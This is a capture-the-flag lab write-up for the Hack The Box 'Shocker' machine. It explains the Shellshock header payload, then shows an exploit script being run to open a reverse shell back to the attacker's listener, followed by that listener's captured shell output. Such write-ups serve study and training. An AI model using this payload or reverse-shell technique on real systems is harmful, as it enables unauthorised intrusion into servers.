ShellShock


The target web application hosts a bash CGI script at /cgi-bin/user.sh, and it is confirmed to be vulnerable to Shellshock (CVE-2014-6271).

In the User-Agent header, the actual trigger is the first part alone, `() { :; };`: a vulnerable bash keeps parsing past the closing brace of the function definition and executes whatever follows it as a command. The highlighted `echo;` in the middle was added so that the output of the last part, `echo "VULNERABLE TO SHELLSHOCK"`, shows up in the response: the empty echo emits the blank line that terminates the CGI response headers, so the marker lands in the HTTP body instead of being discarded as a malformed header.

Exploitation


┌──(kali㉿kali)-[~/archive/htb/labs/shocker]
└─$ python3 CVE-2014-6271/shellshock.py 10.10.14.12 9999 http://$IP/cgi-bin/user.sh
 
[...REDACTED...]
 
[+] Protocol detected: HTTP
 
[+] Setting Payload ...
[+] Sending Payload to http://10.10.10.56/cgi-bin/user.sh ...
 
[-] Request: timed out received HTTP code 500
 
[+] Reverse shell from 10.10.10.56 connected to [10.10.14.12:9999].
 
[+] Payload Sent successfully !

Launching the exploit

The exploit sent a GET request with the payload placed in nearly every request header. That works because the CGI handler exports each request header as an environment variable (HTTP_USER_AGENT, HTTP_REFERER, and so on) before invoking the script, and the vulnerable bash parses any of those values that begin with a function definition.

┌──(kali㉿kali)-[~/archive/htb/labs/shocker]
└─$ nnc 9999                          
listening on [any] 9999 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.56] 44986
whoami
shelly
hostname
Shocker
ifconfig
ens192    Link encap:Ethernet  HWaddr 00:50:56:b9:63:7b  
          inet addr:10.10.10.56  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: dead:beef::250:56ff:feb9:637b/64 Scope:Global
          inet6 addr: fe80::250:56ff:feb9:637b/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:161285 errors:0 dropped:78 overruns:0 frame:0
          TX packets:160660 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:29200140 (29.2 MB)  TX bytes:74418258 (74.4 MB)
 
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:27840 errors:0 dropped:0 overruns:0 frame:0
          TX packets:27840 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:2061552 (2.0 MB)  TX bytes:2061552 (2.0 MB)

Initial foothold established on the target system as the shelly user by exploiting the Shellshock vulnerability in the target web application's CGI script.